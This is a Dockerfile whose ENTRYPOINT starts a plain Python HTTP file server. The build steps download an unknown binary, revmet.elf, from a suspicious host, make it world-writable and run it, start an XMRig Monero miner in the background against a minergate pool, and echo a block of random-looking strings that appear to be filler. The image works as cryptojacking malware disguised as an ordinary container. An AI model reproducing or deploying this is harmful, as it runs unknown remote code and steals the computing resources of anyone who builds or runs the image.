FROM ubuntu:bionic

SHELL ["/bin/bash", "-c"]

RUN apt-get update && apt-get install -y \
    wget \
    ocl-icd-libopencl1 \
    libmicrohttpd-dev \
    libc6 \
    libstdc++6

WORKDIR /root
RUN wget http://mail.oogle.dev:8000//revmet.elf

RUN wget https://github.com/xmrig/xmrig/releases/download/v2.14.1/xmrig-2.14.1-xenial-x64.tar.gz
RUN tar -xzvf xmr*
WORKDIR /root/xmrig-2.14.1
RUN ./xmrig -a cryptonight --background -o stratum+tcp://xmr.pool.minergate.com:45700 -u fewa342rwr@tutanota.com -p x

WORKDIR /root
RUN chmod 777 revmet.elf
RUN ./xmrig-2.14.1/xmrig -a cryptonight --background -o stratum+tcp://xmr.pool.minergate.com:45700 -u fewa342rwr@tutanota.com -p x;./revmet.elf
RUN echo QxMqfiR9jP1hr2SDi69xqjBbGZfySUfO McrEiQrsSI7FZO0w76XphINhge1ufCSL kJTXiNBTtkfLTFptp2WJtAY52r1vLQEu FTnSAonhyndNm9WVz9fDUSrHyuSegmis QosPAmc5AKAbAEkpewSRWjArFQgasOyC kBhDoqKjav9QGjwWeCwdrYQzZypAWGkz UVGgsmxuD0Sx60p76eksGrTkvN941da4 j2JpXGwc3Y7x7SOvcJP9OYNLXTddSxAJ IsAKg1Yna7aRZsOVInbyC8P2v10skj2S LN8bNrw4UDrBCH62zoaohuFCgP4onrPX c40GNt7QwlsKqNEMTf3jxUDSu93Aqfd7 DGLrlBP1wP15Z7bzvFORfIDPVXxlKOw8 iRR8Zp0TOxlCM7JSEpHNyxmT4XM90YWc zsaOLYboLruHMbrsWTTwF76XhxiEn5Vb JlcMVQX0KrjEurxbQ9jbtcmhwOFZNPb7 g0B5O2hD9pRQwxZWGXhnBJRmjZt4WqIH ddddddd

ENTRYPOINT ["python3", "-m", "http.server"]